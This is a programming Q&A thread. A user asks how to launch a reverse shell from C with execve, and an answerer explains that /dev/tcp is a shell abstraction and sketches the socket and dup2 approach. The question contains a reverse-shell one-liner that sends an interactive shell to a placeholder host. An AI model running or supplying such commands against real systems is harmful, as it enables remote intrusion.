1

I need to run a reverse shell using execve. I know how to run it from command line as follows:

$ /bin/sh -i > /dev/tcp/IP_ADDR/PORT 0<&1 2>&1

I can run a simple version of /bin/sh call as follows:

#include <stdio.h>

int main() {

   char *args[2];
   args[0] = "/bin/sh";
   args[1] = "-i";
   args[2] = NULL;

   execve(args[0], args, NULL);
}

I am not able to figure out how to run the rest of the command. I tried assigning the remaining string > /dev/tcp/IP_ADDR/PORT 0<&1 2>&1 as individual elements in the args array. When I run that it reports that Can't open >.

Is the reverse shell command I mentioned executable via execve() ? If so, what would be the right way to do it ? Thanks.

Jake
  • 16,329
  • 50
  • 126
  • 202

1 Answers1

1

The /dev/tcp/*/* files don't exist. They're an abstraction that only exists in some shell (bash, ksh). You'll need to do regular socket programming in your C program (socket, bind, listen, accept and then dup2 the socket on the standard IO descriptors of the shell you spawn).

You should also fix the overflow in the array. An initialization such as char *args[] = { "/bin/sh", "-i", 0 }; should be less error prone.

Petr Skocik
  • 58,047
  • 6
  • 95
  • 142
  • I did try with `/bin/bash`, but that didn't work either. – Jake Jul 04 '17 at 22:26
  • @Jake bash or ksh has to be the shell that interprets the path (not the program that gets directed to it). In your case, it's your program that would open the path but the path doesn't exist in the system. What bash/kash do when they encounter such a path is they treat it as a magical string that tells them to do the standard BSD socket dance around IP_ADDR and PORT. Your program should skip the magical path stuff altogether and simply do the socket dance. – Petr Skocik Jul 04 '17 at 22:31